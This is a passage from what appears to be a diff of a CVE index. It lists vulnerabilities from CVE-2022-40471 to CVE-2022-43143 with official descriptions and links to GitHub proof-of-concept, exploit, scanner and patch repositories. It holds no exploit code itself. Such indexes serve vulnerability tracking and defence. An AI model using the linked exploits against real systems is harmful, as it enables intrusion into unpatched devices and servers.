[RashidKhanPathan/CVE-2022-40471](https://github.com/RashidKhanPathan/CVE-2022-40471) + +### CVE-2022-40490 +- [whitej3rry/CVE-2022-40490](https://github.com/whitej3rry/CVE-2022-40490) + +### CVE-2022-40494 (2022-10-06) + +NPS before v0.26.10 was discovered to contain an authentication bypass vulnerability via constantly generating and sending the Auth key and Timestamp parameters. + + +- [carr0t2/nps-auth-bypass](https://github.com/carr0t2/nps-auth-bypass) + +### CVE-2022-40624 (2022-12-20) + +pfSense pfBlockerNG through 2.1.4_27 allows remote attackers to execute arbitrary OS commands as root via the HTTP Host header, a different vulnerability than CVE-2022-31814. + + +- [dhammon/pfBlockerNg-CVE-2022-40624](https://github.com/dhammon/pfBlockerNg-CVE-2022-40624) + +### CVE-2022-40634 (2022-09-13) + +Improper Control of Dynamically-Managed Code Resources vulnerability in Crafter Studio of Crafter CMS allows authenticated developers to execute OS commands via FreeMarker SSTI. + + +- [mbadanoiu/CVE-2022-40634](https://github.com/mbadanoiu/CVE-2022-40634) + +### CVE-2022-40635 (2022-09-13) + +Improper Control of Dynamically-Managed Code Resources vulnerability in Crafter Studio of Crafter CMS allows authenticated developers to execute OS commands via Groovy Sandbox Bypass. + + +- [mbadanoiu/CVE-2022-40635](https://github.com/mbadanoiu/CVE-2022-40635) + +### CVE-2022-40684 (2022-10-18) + +An authentication bypass using an alternate path or channel [CWE-288] in Fortinet FortiOS version 7.2.0 through 7.2.1 and 7.0.0 through 7.0.6, FortiProxy version 7.2.0 and version 7.0.0 through 7.0.6 and FortiSwitchManager version 7.2.0 and 7.0.0 allows an unauthenticated atttacker to perform operations on the administrative interface via specially crafted HTTP or HTTPS requests. + + +- [horizon3ai/CVE-2022-40684](https://github.com/horizon3ai/CVE-2022-40684) +- [carlosevieira/CVE-2022-40684](https://github.com/carlosevieira/CVE-2022-40684) +- [Filiplain/Fortinet-PoC-Auth-Bypass](https://github.com/Filiplain/Fortinet-PoC-Auth-Bypass) +- [kljunowsky/CVE-2022-40684-POC](https://github.com/kljunowsky/CVE-2022-40684-POC) +- [secunnix/CVE-2022-40684](https://github.com/secunnix/CVE-2022-40684) +- [iveresk/CVE-2022-40684](https://github.com/iveresk/CVE-2022-40684) +- [mhd108/CVE-2022-40684](https://github.com/mhd108/CVE-2022-40684) +- [ClickCyber/cve-2022-40684](https://github.com/ClickCyber/cve-2022-40684) +- [Chocapikk/CVE-2022-40684](https://github.com/Chocapikk/CVE-2022-40684) +- [mohamedbenchikh/CVE-2022-40684](https://github.com/mohamedbenchikh/CVE-2022-40684) +- [HAWA771/CVE-2022-40684](https://github.com/HAWA771/CVE-2022-40684) +- [NeriaBasha/CVE-2022-40684](https://github.com/NeriaBasha/CVE-2022-40684) +- [Grapphy/fortipwn](https://github.com/Grapphy/fortipwn) +- [puckiestyle/CVE-2022-40684](https://github.com/puckiestyle/CVE-2022-40684) +- [jsongmax/Fortinet-CVE-2022-40684](https://github.com/jsongmax/Fortinet-CVE-2022-40684) +- [und3sc0n0c1d0/CVE-2022-40684](https://github.com/und3sc0n0c1d0/CVE-2022-40684) +- [qingsiweisan/CVE-2022-40684](https://github.com/qingsiweisan/CVE-2022-40684) +- [TaroballzChen/CVE-2022-40684-metasploit-scanner](https://github.com/TaroballzChen/CVE-2022-40684-metasploit-scanner) +- [gustavorobertux/gotigate](https://github.com/gustavorobertux/gotigate) +- [hughink/CVE-2022-40684](https://github.com/hughink/CVE-2022-40684) +- [notareaperbutDR34P3r/CVE-2022-40684-Rust](https://github.com/notareaperbutDR34P3r/CVE-2022-40684-Rust) +- [z-bool/CVE-2022-40684](https://github.com/z-bool/CVE-2022-40684) +- [Anthony1500/CVE-2022-40684](https://github.com/Anthony1500/CVE-2022-40684) + +### CVE-2022-40687 (2022-11-18) + +Cross-Site Request Forgery (CSRF) vulnerability in Creative Mail plugin <= 1.5.4 on WordPress. + + +- [williamkhepri/CVE-2022-40687-metasploit-scanner](https://github.com/williamkhepri/CVE-2022-40687-metasploit-scanner) + +### CVE-2022-40769 (2022-09-18) + +profanity through 1.60 has only four billion possible RNG initializations. Thus, attackers can recover private keys from Ethereum vanity addresses and steal cryptocurrency, as exploited in the wild in June 2022. + + +- [PLSRcoin/CVE-2022-40769](https://github.com/PLSRcoin/CVE-2022-40769) + +### CVE-2022-40799 (2022-11-29) + +Data Integrity Failure in 'Backup Config' in D-Link DNR-322L <= 2.60B15 allows an authenticated attacker to execute OS level commands on the device. + + +- [rtfmkiesel/CVE-2022-40799](https://github.com/rtfmkiesel/CVE-2022-40799) + +### CVE-2022-40881 (2022-11-17) + +SolarView Compact 6.00 was discovered to contain a command injection vulnerability via network_test.php + + +- [yilin1203/CVE-2022-40881](https://github.com/yilin1203/CVE-2022-40881) + +### CVE-2022-40916 +- [whitej3rry/CVE-2022-40916](https://github.com/whitej3rry/CVE-2022-40916) + +### CVE-2022-41032 (2022-10-11) + +NuGet Client Elevation of Privilege Vulnerability + + +- [ethomson/cve-2022-41032](https://github.com/ethomson/cve-2022-41032) + +### CVE-2022-41034 (2022-10-11) + +Visual Studio Code Remote Code Execution Vulnerability + + +- [andyhsu024/CVE-2022-41034](https://github.com/andyhsu024/CVE-2022-41034) + +### CVE-2022-41040 (2022-10-03) + +Microsoft Exchange Server Elevation of Privilege Vulnerability + + +- [numanturle/CVE-2022-41040](https://github.com/numanturle/CVE-2022-41040) +- [CentarisCyber/CVE-2022-41040_Mitigation](https://github.com/CentarisCyber/CVE-2022-41040_Mitigation) +- [r3dcl1ff/CVE-2022-41040](https://github.com/r3dcl1ff/CVE-2022-41040) +- [d3duct1v/CVE-2022-41040](https://github.com/d3duct1v/CVE-2022-41040) +- [kljunowsky/CVE-2022-41040-POC](https://github.com/kljunowsky/CVE-2022-41040-POC) +- [rjsudlow/proxynotshell-IOC-Checker](https://github.com/rjsudlow/proxynotshell-IOC-Checker) +- [ITPATJIDR/CVE-2022-41040](https://github.com/ITPATJIDR/CVE-2022-41040) +- [TaroballzChen/CVE-2022-41040-metasploit-ProxyNotShell](https://github.com/TaroballzChen/CVE-2022-41040-metasploit-ProxyNotShell) +- [0-Gram/CVE-2022-41040](https://github.com/0-Gram/CVE-2022-41040) + +### CVE-2022-41049 (2022-11-09) + +Windows Mark of the Web Security Feature Bypass Vulnerability + + +- [Nathan01110011/CVE-2022-41049-POC](https://github.com/Nathan01110011/CVE-2022-41049-POC) + +### CVE-2022-41080 (2022-11-09) + +Microsoft Exchange Server Elevation of Privilege Vulnerability + + +- [ohnonoyesyes/CVE-2022-41080](https://github.com/ohnonoyesyes/CVE-2022-41080) + +### CVE-2022-41082 (2022-10-03) + +Microsoft Exchange Server Remote Code Execution Vulnerability + + +- [Diverto/nse-exchange](https://github.com/Diverto/nse-exchange) +- [notareaperbutDR34P3r/http-vuln-CVE-2022-41082](https://github.com/notareaperbutDR34P3r/http-vuln-CVE-2022-41082) +- [sikkertech/CVE-2022-41082](https://github.com/sikkertech/CVE-2022-41082) +- [balki97/OWASSRF-CVE-2022-41082-POC](https://github.com/balki97/OWASSRF-CVE-2022-41082-POC) +- [bigherocenter/CVE-2022-41082-POC](https://github.com/bigherocenter/CVE-2022-41082-POC) +- [notareaperbutDR34P3r/vuln-CVE-2022-41082](https://github.com/notareaperbutDR34P3r/vuln-CVE-2022-41082) +- [SUPRAAA-1337/CVE-2022-41082](https://github.com/SUPRAAA-1337/CVE-2022-41082) +- [soltanali0/CVE-2022-41082](https://github.com/soltanali0/CVE-2022-41082) + +### CVE-2022-41099 (2022-11-09) + +BitLocker Security Feature Bypass Vulnerability + + +- [halsey51013/UpdateWindowsRE-CVE-2022-41099](https://github.com/halsey51013/UpdateWindowsRE-CVE-2022-41099) +- [o0MattE0o/CVE-2022-41099-Fix](https://github.com/o0MattE0o/CVE-2022-41099-Fix) +- [g-gill24/WinRE-Patch](https://github.com/g-gill24/WinRE-Patch) +- [dsn1321/KB5025175-CVE-2022-41099](https://github.com/dsn1321/KB5025175-CVE-2022-41099) +- [rhett-hislop/PatchWinRE](https://github.com/rhett-hislop/PatchWinRE) + +### CVE-2022-41114 (2022-11-09) + +Windows Bind Filter Driver Elevation of Privilege Vulnerability + + +- [gmh5225/CVE-2022-41114](https://github.com/gmh5225/CVE-2022-41114) + +### CVE-2022-41218 (2022-09-21) + +In drivers/media/dvb-core/dmxdev.c in the Linux kernel through 5.19.10, there is a use-after-free caused by refcount races, affecting dvb_demux_open and dvb_dmxdev_release. + + +- [Tobey123/CVE-2022-41218](https://github.com/Tobey123/CVE-2022-41218) + +### CVE-2022-41220 (2022-09-21) + +md2roff 1.9 has a stack-based buffer overflow via a Markdown file, a different vulnerability than CVE-2022-34913. NOTE: the vendor's position is that the product is not intended for untrusted input + + +- [Halcy0nic/CVE-2022-41220](https://github.com/Halcy0nic/CVE-2022-41220) + +### CVE-2022-41272 (2022-12-13) + +An unauthenticated attacker over the network can attach to an open interface exposed through JNDI by the User Defined Search (UDS) of SAP NetWeaver Process Integration (PI) - version 7.50 and make use of an open naming and directory API to access services which can be used to perform unauthorized operations affecting users and data across the entire system. This allows the attacker to have full read access to user data, make limited modifications to user data, and degrade the performance of the system, leading to a high impact on confidentiality and a limited impact on the availability and integrity of the application.\n + + +- [redrays-io/CVE-2022-41272](https://github.com/redrays-io/CVE-2022-41272) + +### CVE-2022-41333 (2023-03-07) + +An uncontrolled resource consumption vulnerability [CWE-400] in FortiRecorder version 6.4.3 and below, 6.0.11 and below login authentication mechanism may allow an unauthenticated attacker to make the device unavailable via crafted GET requests. + + +- [polar0x/CVE-2022-41333](https://github.com/polar0x/CVE-2022-41333) + +### CVE-2022-41343 (2022-09-25) + +registerFont in FontMetrics.php in Dompdf before 2.0.1 allows remote file inclusion because a URI validation failure does not halt font registration, as demonstrated by a @font-face rule. + + +- [BKreisel/CVE-2022-41343](https://github.com/BKreisel/CVE-2022-41343) + +### CVE-2022-41352 (2022-09-26) + +An issue was discovered in Zimbra Collaboration (ZCS) 8.8.15 and 9.0. An attacker can upload arbitrary files through amavis via a cpio loophole (extraction to /opt/zimbra/jetty/webapps/zimbra/public) that can lead to incorrect access to any other user accounts. Zimbra recommends pax over cpio. Also, pax is in the prerequisites of Zimbra on Ubuntu; however, pax is no longer part of a default Red Hat installation after RHEL 6 (or CentOS 6). Once pax is installed, amavis automatically prefers it over cpio. + + +- [segfault-it/cve-2022-41352](https://github.com/segfault-it/cve-2022-41352) +- [Cr4ckC4t/cve-2022-41352-zimbra-rce](https://github.com/Cr4ckC4t/cve-2022-41352-zimbra-rce) +- [qailanet/cve-2022-41352-zimbra-rce](https://github.com/qailanet/cve-2022-41352-zimbra-rce) + +### CVE-2022-41358 (2022-10-20) + +A stored cross-site scripting (XSS) vulnerability in Garage Management System v1.0 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the categoriesName parameter in createCategories.php. + + +- [thecasual/CVE-2022-41358](https://github.com/thecasual/CVE-2022-41358) + +### CVE-2022-41401 (2023-08-04) + +OpenRefine <= v3.5.2 contains a Server-Side Request Forgery (SSRF) vulnerability, which permits unauthorized users to exploit the system, potentially leading to unauthorized access to internal resources and sensitive file disclosure. + + +- [ixSly/CVE-2022-41401](https://github.com/ixSly/CVE-2022-41401) + +### CVE-2022-41412 (2022-11-30) + +An issue in the graphData.cgi component of perfSONAR v4.4.5 and prior allows attackers to access sensitive data and execute Server-Side Request Forgery (SSRF) attacks. + + +- [renmizo/CVE-2022-41412](https://github.com/renmizo/CVE-2022-41412) + +### CVE-2022-41413 (2022-11-30) + +perfSONAR v4.x <= v4.4.5 was discovered to contain a Cross-Site Request Forgery (CSRF) which is triggered when an attacker injects crafted input into the Search function. + + +- [renmizo/CVE-2022-41413](https://github.com/renmizo/CVE-2022-41413) + +### CVE-2022-41445 (2022-11-22) + +A cross-site scripting (XSS) vulnerability in Record Management System using CodeIgniter 1.0 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Add Subject page. + + +- [RashidKhanPathan/CVE-2022-41445](https://github.com/RashidKhanPathan/CVE-2022-41445) + +### CVE-2022-41446 (2022-11-23) + +An access control issue in /Admin/dashboard.php of Record Management System using CodeIgniter v1.0 allows attackers to access and modify user data. + + +- [RashidKhanPathan/CVE-2022-41446](https://github.com/RashidKhanPathan/CVE-2022-41446) + +### CVE-2022-41540 (2022-10-18) + +The web app client of TP-Link AX10v1 V1_211117 uses hard-coded cryptographic keys when communicating with the router. Attackers who are able to intercept the communications between the web client and router through a man-in-the-middle attack can then obtain the sequence key via a brute-force attack, and access sensitive information. + + +- [efchatz/easy-exploits](https://github.com/efchatz/easy-exploits) + +### CVE-2022-41544 (2022-10-18) + +GetSimple CMS v3.3.16 was discovered to contain a remote code execution (RCE) vulnerability via the edited_file parameter in admin/theme-edit.php. + + +- [yosef0x01/CVE-2022-41544](https://github.com/yosef0x01/CVE-2022-41544) +- [n3rdh4x0r/CVE-2022-41544](https://github.com/n3rdh4x0r/CVE-2022-41544) + +### CVE-2022-41622 (2022-12-07) + +In all versions, \n\nBIG-IP and BIG-IQ are vulnerable to cross-site request forgery (CSRF) attacks through iControl SOAP.  \n\nNote: Software versions which have reached End of Technical Support (EoTS) are not evaluated.\n\n + + +- [rbowes-r7/refreshing-soap-exploit](https://github.com/rbowes-r7/refreshing-soap-exploit) + +### CVE-2022-41717 (2022-12-08) + +An attacker can cause excessive memory growth in a Go server accepting HTTP/2 requests. HTTP/2 server connections contain a cache of HTTP header keys sent by the client. While the total number of entries in this cache is capped, an attacker sending very large keys can cause the server to allocate approximately 64 MiB per open connection. + + +- [domdom82/h2conn-exploit](https://github.com/domdom82/h2conn-exploit) + +### CVE-2022-41741 (2022-10-19) + +NGINX Open Source before versions 1.23.2 and 1.22.1, NGINX Open Source Subscription before versions R2 P1 and R1 P1, and NGINX Plus before versions R27 P1 and R26 P1 have a vulnerability in the module ngx_http_mp4_module that might allow a local attacker to corrupt NGINX worker memory, resulting in its termination or potential other impact using a specially crafted audio or video file. The issue affects only NGINX products that are built with the ngx_http_mp4_module, when the mp4 directive is used in the configuration file. Further, the attack is possible only if an attacker can trigger processing of a specially crafted audio or video file with the module ngx_http_mp4_module. + + +- [dumbbutt0/evilMP4](https://github.com/dumbbutt0/evilMP4) + +### CVE-2022-41828 (2022-09-29) + +In Amazon AWS Redshift JDBC Driver (aka amazon-redshift-jdbc-driver or redshift-jdbc42) before 2.1.0.8, the Object Factory does not check the class type when instantiating an object from a class name. + + +- [murataydemir/CVE-2022-41828](https://github.com/murataydemir/CVE-2022-41828) + +### CVE-2022-41852 +- [Warxim/CVE-2022-41852](https://github.com/Warxim/CVE-2022-41852) +- [xpectomas/CVE-2022-41852-Disable](https://github.com/xpectomas/CVE-2022-41852-Disable) + +### CVE-2022-41853 (2022-10-06) + +Those using java.sql.Statement or java.sql.PreparedStatement in hsqldb (HyperSQL DataBase) to process untrusted input may be vulnerable to a remote code execution attack. By default it is allowed to call any static method of any Java class in the classpath resulting in code execution. The issue can be prevented by updating to 2.7.1 or by setting the system property "hsqldb.method_class_names" to classes which are allowed to be called. For example, System.setProperty("hsqldb.method_class_names", "abc") or Java argument -Dhsqldb.method_class_names="abc" can be used. From version 2.7.1 all classes by default are not accessible except those in java.lang.Math and need to be manually enabled. + + +- [mbadanoiu/CVE-2022-41853](https://github.com/mbadanoiu/CVE-2022-41853) + +### CVE-2022-41876 (2022-11-10) + +ezplatform-graphql is a GraphQL server implementation for Ibexa DXP and Ibexa Open Source. Versions prior to 2.3.12 and 1.0.13 are subject to Insecure Storage of Sensitive Information. Unauthenticated GraphQL queries for user accounts can expose password hashes of users that have created or modified content, typically administrators and editors. This issue has been patched in versions 2.3.12, and 1.0.13 on the 1.X branch. Users unable to upgrade can remove the "passwordHash" entry from "src/bundle/Resources/config/graphql/User.types.yaml" in the GraphQL package, and other properties like hash type, email, login if you prefer. + + +- [Skileau/CVE-2022-41876](https://github.com/Skileau/CVE-2022-41876) + +### CVE-2022-41903 (2023-01-17) + +Git is distributed revision control system. `git log` can display commits in an arbitrary format using its `--format` specifiers. This functionality is also exposed to `git archive` via the `export-subst` gitattribute. When processing the padding operators, there is a integer overflow in `pretty.c::format_and_pad_commit()` where a `size_t` is stored improperly as an `int`, and then added as an offset to a `memcpy()`. This overflow can be triggered directly by a user running a command which invokes the commit formatting machinery (e.g., `git log --format=...`). It may also be triggered indirectly through git archive via the export-subst mechanism, which expands format specifiers inside of files within the repository during a git archive. This integer overflow can result in arbitrary heap writes, which may result in arbitrary code execution. The problem has been patched in the versions published on 2023-01-17, going back to v2.30.7. Users are advised to upgrade. Users who are unable to upgrade should disable `git archive` in untrusted repositories. If you expose git archive via `git daemon`, disable it by running `git config --global daemon.uploadArch false`. + + +- [sondermc/git-cveissues](https://github.com/sondermc/git-cveissues) + +### CVE-2022-41923 (2022-11-23) + +Grails Spring Security Core plugin is vulnerable to privilege escalation. The vulnerability allows an attacker access to one endpoint (i.e. the targeted endpoint) using the authorization requirements of a different endpoint (i.e. the donor endpoint). In some Grails framework applications, access to the targeted endpoint will be granted based on meeting the authorization requirements of the donor endpoint, which can result in a privilege escalation attack. This vulnerability has been patched in grails-spring-security-core versions 3.3.2, 4.0.5 and 5.1.1. Impacted Applications: Grails Spring Security Core plugin versions: 1.x 2.x >=3.0.0 <3.3.2 >=4.0.0 <4.0.5 >=5.0.0 <5.1.1 We strongly suggest that all Grails framework applications using the Grails Spring Security Core plugin be updated to a patched release of the plugin. Workarounds: Users should create a subclass extending one of the following classes from the `grails.plugin.springsecurity.web.access.intercept` package, depending on their security configuration: * `AnnotationFilterInvocationDefinition` * `InterceptUrlMapFilterInvocationDefinition` * `RequestmapFilterInvocationDefinition` In each case, the subclass should override the `calculateUri` method like so: ``` @Override protected String calculateUri(HttpServletRequest request) { UrlPathHelper.defaultInstance.getRequestUri(request) } ``` This should be considered a temporary measure, as the patched versions of grails-spring-security-core deprecates the `calculateUri` method. Once upgraded to a patched version of the plugin, this workaround is no longer needed. The workaround is especially important for version 2.x, as no patch is available version 2.x of the GSSC plugin. + + +- [grails/GSSC-CVE-2022-41923](https://github.com/grails/GSSC-CVE-2022-41923) + +### CVE-2022-41966 (2022-12-27) + +XStream serializes Java objects to XML and back again. Versions prior to 1.4.20 may allow a remote attacker to terminate the application with a stack overflow error, resulting in a denial of service only via manipulation the processed input stream. The attack uses the hash code implementation for collections and maps to force recursive hash calculation causing a stack overflow. This issue is patched in version 1.4.20 which handles the stack overflow and raises an InputManipulationException instead. A potential workaround for users who only use HashMap or HashSet and whose XML refers these only as default map or set, is to change the default implementation of java.util.Map and java.util per the code example in the referenced advisory. However, this implies that your application does not care about the implementation of the map and all elements are comparable. + + +- [111ddea/Xstream_cve-2022-41966](https://github.com/111ddea/Xstream_cve-2022-41966) + +### CVE-2022-42045 (2023-07-13) + +Certain Zemana products are vulnerable to Arbitrary code injection. This affects Watchdog Anti-Malware 4.1.422 and Zemana AntiMalware 3.2.28. + + +- [ReCryptLLC/CVE-2022-42045](https://github.com/ReCryptLLC/CVE-2022-42045) + +### CVE-2022-42046 (2022-12-20) + +wfshbr64.sys and wfshbr32.sys specially crafted IOCTL allows arbitrary user to perform local privilege escalation + + +- [kkent030315/CVE-2022-42046](https://github.com/kkent030315/CVE-2022-42046) + +### CVE-2022-42094 (2022-11-22) + +Backdrop CMS version 1.23.0 was discovered to contain a stored cross-site scripting (XSS) vulnerability via the 'Card' content. + + +- [bypazs/CVE-2022-42094](https://github.com/bypazs/CVE-2022-42094) + +### CVE-2022-42095 (2022-11-23) + +Backdrop CMS version 1.23.0 was discovered to contain a stored cross-site scripting (XSS) vulnerability via the Page content. + + +- [bypazs/CVE-2022-42095](https://github.com/bypazs/CVE-2022-42095) + +### CVE-2022-42096 (2022-11-21) + +Backdrop CMS version 1.23.0 was discovered to contain a stored cross-site scripting (XSS) vulnerability via Post content. + + +- [bypazs/CVE-2022-42096](https://github.com/bypazs/CVE-2022-42096) + +### CVE-2022-42097 (2022-11-22) + +Backdrop CMS version 1.23.0 was discovered to contain a stored cross-site scripting (XSS) vulnerability via 'Comment.' . + + +- [bypazs/CVE-2022-42097](https://github.com/bypazs/CVE-2022-42097) + +### CVE-2022-42098 (2022-11-22) + +KLiK SocialMediaWebsite version v1.0.1 is vulnerable to SQL Injection via the profile.php. + + +- [bypazs/CVE-2022-42098](https://github.com/bypazs/CVE-2022-42098) + +### CVE-2022-42176 (2022-10-20) + +In PCTechSoft PCSecure V5.0.8.xw, use of Hard-coded Credentials in configuration files leads to admin panel access. + + +- [soy-oreocato/CVE-2022-42176](https://github.com/soy-oreocato/CVE-2022-42176) + +### CVE-2022-42475 (2023-01-02) + +A heap-based buffer overflow vulnerability [CWE-122] in FortiOS SSL-VPN 7.2.0 through 7.2.2, 7.0.0 through 7.0.8, 6.4.0 through 6.4.10, 6.2.0 through 6.2.11, 6.0.15 and earlier and FortiProxy SSL-VPN 7.2.0 through 7.2.1, 7.0.7 and earlier may allow a remote unauthenticated attacker to execute arbitrary code or commands via specifically crafted requests. + + +- [bryanster/ioc-cve-2022-42475](https://github.com/bryanster/ioc-cve-2022-42475) +- [scrt/cve-2022-42475](https://github.com/scrt/cve-2022-42475) +- [Amir-hy/cve-2022-42475](https://github.com/Amir-hy/cve-2022-42475) +- [Mustafa1986/cve-2022-42475-Fortinet](https://github.com/Mustafa1986/cve-2022-42475-Fortinet) +- [3yujw7njai/CVE-2022-42475-RCE-POC](https://github.com/3yujw7njai/CVE-2022-42475-RCE-POC) +- [natceil/cve-2022-42475](https://github.com/natceil/cve-2022-42475) +- [0xhaggis/CVE-2022-42475](https://github.com/0xhaggis/CVE-2022-42475) + +### CVE-2022-42703 (2022-10-09) + +mm/rmap.c in the Linux kernel before 5.19.7 has a use-after-free related to leaf anon_vma double reuse. + + +- [Squirre17/hbp-attack-demo](https://github.com/Squirre17/hbp-attack-demo) +- [Satheesh575555/linux-4.1.15_CVE-2022-42703](https://github.com/Satheesh575555/linux-4.1.15_CVE-2022-42703) + +### CVE-2022-42864 (2022-12-15) + +A race condition was addressed with improved state handling. This issue is fixed in tvOS 16.2, macOS Monterey 12.6.2, macOS Ventura 13.1, macOS Big Sur 11.7.2, iOS 15.7.2 and iPadOS 15.7.2, iOS 16.2 and iPadOS 16.2, watchOS 9.2. An app may be able to execute arbitrary code with kernel privileges. + + +- [Muirey03/CVE-2022-42864](https://github.com/Muirey03/CVE-2022-42864) + +### CVE-2022-42889 (2022-10-13) + +Apache Commons Text performs variable interpolation, allowing properties to be dynamically evaluated and expanded. The standard format for interpolation is "${prefix:name}", where "prefix" is used to locate an instance of org.apache.commons.text.lookup.StringLookup that performs the interpolation. Starting with version 1.5 and continuing through 1.9, the set of default Lookup instances included interpolators that could result in arbitrary code execution or contact with remote servers. These lookups are: - "script" - execute expressions using the JVM script execution engine (javax.script) - "dns" - resolve dns records - "url" - load values from urls, including from remote servers Applications using the interpolation defaults in the affected versions may be vulnerable to remote code execution or unintentional contact with remote servers if untrusted configuration values are used. Users are recommended to upgrade to Apache Commons Text 1.10.0, which disables the problematic interpolators by default. + + +- [SeanWrightSec/CVE-2022-42889-PoC](https://github.com/SeanWrightSec/CVE-2022-42889-PoC) +- [chainguard-dev/text4shell-policy](https://github.com/chainguard-dev/text4shell-policy) +- [tulhan/commons-text-goat](https://github.com/tulhan/commons-text-goat) +- [karthikuj/cve-2022-42889-text4shell-docker](https://github.com/karthikuj/cve-2022-42889-text4shell-docker) +- [ClickCyber/cve-2022-42889](https://github.com/ClickCyber/cve-2022-42889) +- [korteke/CVE-2022-42889-POC](https://github.com/korteke/CVE-2022-42889-POC) +- [rockmelodies/CVE-2022-42889](https://github.com/rockmelodies/CVE-2022-42889) +- [eunomie/cve-2022-42889-check](https://github.com/eunomie/cve-2022-42889-check) +- [kljunowsky/CVE-2022-42889-text4shell](https://github.com/kljunowsky/CVE-2022-42889-text4shell) +- [securekomodo/text4shell-scan](https://github.com/securekomodo/text4shell-scan) +- [neerazz/CVE-2022-42889](https://github.com/neerazz/CVE-2022-42889) +- [uk0/cve-2022-42889-intercept](https://github.com/uk0/cve-2022-42889-intercept) +- [securekomodo/text4shell-poc](https://github.com/securekomodo/text4shell-poc) +- [humbss/CVE-2022-42889](https://github.com/humbss/CVE-2022-42889) +- [stavrosgns/Text4ShellPayloads](https://github.com/stavrosgns/Text4ShellPayloads) +- [s3l33/CVE-2022-42889](https://github.com/s3l33/CVE-2022-42889) +- [galoget/CVE-2022-42889-Text4Shell-Docker](https://github.com/galoget/CVE-2022-42889-Text4Shell-Docker) +- [rhitikwadhvana/CVE-2022-42889-Text4Shell-Exploit-POC](https://github.com/rhitikwadhvana/CVE-2022-42889-Text4Shell-Exploit-POC) +- [akshayithape-devops/CVE-2022-42889-POC](https://github.com/akshayithape-devops/CVE-2022-42889-POC) +- [0xmaximus/Apache-Commons-Text-CVE-2022-42889](https://github.com/0xmaximus/Apache-Commons-Text-CVE-2022-42889) +- [smileostrich/Text4Shell-Scanner](https://github.com/smileostrich/Text4Shell-Scanner) +- [cxzero/CVE-2022-42889-text4shell](https://github.com/cxzero/CVE-2022-42889-text4shell) +- [Vulnmachines/text4shell-CVE-2022-42889](https://github.com/Vulnmachines/text4shell-CVE-2022-42889) +- [Gotcha-1G/CVE-2022-42889](https://github.com/Gotcha-1G/CVE-2022-42889) +- [cryxnet/CVE-2022-42889-RCE](https://github.com/cryxnet/CVE-2022-42889-RCE) +- [sunnyvale-it/CVE-2022-42889-PoC](https://github.com/sunnyvale-it/CVE-2022-42889-PoC) +- [QAInsights/cve-2022-42889-jmeter](https://github.com/QAInsights/cve-2022-42889-jmeter) +- [adarshpv9746/Text4shell--Automated-exploit---CVE-2022-42889](https://github.com/adarshpv9746/Text4shell--Automated-exploit---CVE-2022-42889) +- [pwnb0y/Text4shell-exploit](https://github.com/pwnb0y/Text4shell-exploit) +- [gokul-ramesh/text4shell-exploit](https://github.com/gokul-ramesh/text4shell-exploit) +- [f0ng/text4shellburpscanner](https://github.com/f0ng/text4shellburpscanner) +- [devenes/text4shell-cve-2022-42889](https://github.com/devenes/text4shell-cve-2022-42889) +- [hotblac/text4shell](https://github.com/hotblac/text4shell) +- [necroteddy/CVE-2022-42889](https://github.com/necroteddy/CVE-2022-42889) +- [ReachabilityOrg/cve-2022-42889-text4shell-docker](https://github.com/ReachabilityOrg/cve-2022-42889-text4shell-docker) +- [dgor2023/cve-2022-42889-text4shell-docker](https://github.com/dgor2023/cve-2022-42889-text4shell-docker) +- [Dima2021/cve-2022-42889-text4shell](https://github.com/Dima2021/cve-2022-42889-text4shell) +- [aaronm-sysdig/text4shell-docker](https://github.com/aaronm-sysdig/text4shell-docker) +- [gustanini/CVE-2022-42889-Text4Shell-POC](https://github.com/gustanini/CVE-2022-42889-Text4Shell-POC) +- [Sic4rio/CVE-2022-42889](https://github.com/Sic4rio/CVE-2022-42889) +- [34006133/CVE-2022-42889](https://github.com/34006133/CVE-2022-42889) +- [DimaMend/cve-2022-42889-text4shell](https://github.com/DimaMend/cve-2022-42889-text4shell) +- [joshbnewton31080/cve-2022-42889-text4shell](https://github.com/joshbnewton31080/cve-2022-42889-text4shell) +- [MendDemo-josh/cve-2022-42889-text4shell](https://github.com/MendDemo-josh/cve-2022-42889-text4shell) + +### CVE-2022-42896 (2022-11-23) + +There are use-after-free vulnerabilities in the Linux kernel's net/bluetooth/l2cap_core.c's l2cap_connect and l2cap_le_connect_req functions which may allow code execution and leaking kernel memory (respectively) remotely via Bluetooth. A remote attacker could execute code leaking kernel memory via Bluetooth if within proximity of the victim.\n\nWe recommend upgrading past commit  https://www.google.com/url https://github.com/torvalds/linux/commit/711f8c3fb3db61897080468586b970c87c61d9e4 https://www.google.com/url \n\n + + +- [Satheesh575555/linux-4.19.72_CVE-2022-42896](https://github.com/Satheesh575555/linux-4.19.72_CVE-2022-42896) +- [hshivhare67/kernel_v4.19.72_CVE-2022-42896_old](https://github.com/hshivhare67/kernel_v4.19.72_CVE-2022-42896_old) +- [Trinadh465/linux-4.19.72_CVE-2022-42896](https://github.com/Trinadh465/linux-4.19.72_CVE-2022-42896) +- [hshivhare67/kernel_v4.19.72_CVE-2022-42896_new](https://github.com/hshivhare67/kernel_v4.19.72_CVE-2022-42896_new) +- [himanshu667/kernel_v4.19.72_CVE-2022-42896](https://github.com/himanshu667/kernel_v4.19.72_CVE-2022-42896) + +### CVE-2022-42899 (2022-10-13) + +Bentley MicroStation and MicroStation-based applications may be affected by out-of-bounds read and stack overflow issues when opening crafted SKP files. Exploiting these issues could lead to information disclosure and code execution. The fixed versions are 10.17.01.58* for MicroStation and 10.17.01.19* for Bentley View. + + +- [iamsanjay/CVE-2022-42899](https://github.com/iamsanjay/CVE-2022-42899) + +### CVE-2022-43096 (2022-11-17) + +Mediatrix 4102 before v48.5.2718 allows local attackers to gain root access via the UART port. + + +- [ProxyStaffy/Mediatrix-CVE-2022-43096](https://github.com/ProxyStaffy/Mediatrix-CVE-2022-43096) + +### CVE-2022-43097 (2022-12-05) + +Phpgurukul User Registration & User Management System v3.0 was discovered to contain multiple stored cross-site scripting (XSS) vulnerabilities via the firstname and lastname parameters of the registration form & login pages. + + +- [nibin-m/CVE-2022-43097](https://github.com/nibin-m/CVE-2022-43097) + +### CVE-2022-43117 (2022-11-21) + +Sourcecodester Password Storage Application in PHP/OOP and MySQL 1.0 was discovered to contain multiple cross-site scripting (XSS) vulnerabilities via the Name, Username, Description and Site Feature parameters. + + +- [RashidKhanPathan/CVE-2022-43117](https://github.com/RashidKhanPathan/CVE-2022-43117) + +### CVE-2022-43143 (2022-11-21) + +A cross-site scripting (XSS) vulnerability in Beekeeper Studio v3.6.6 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected 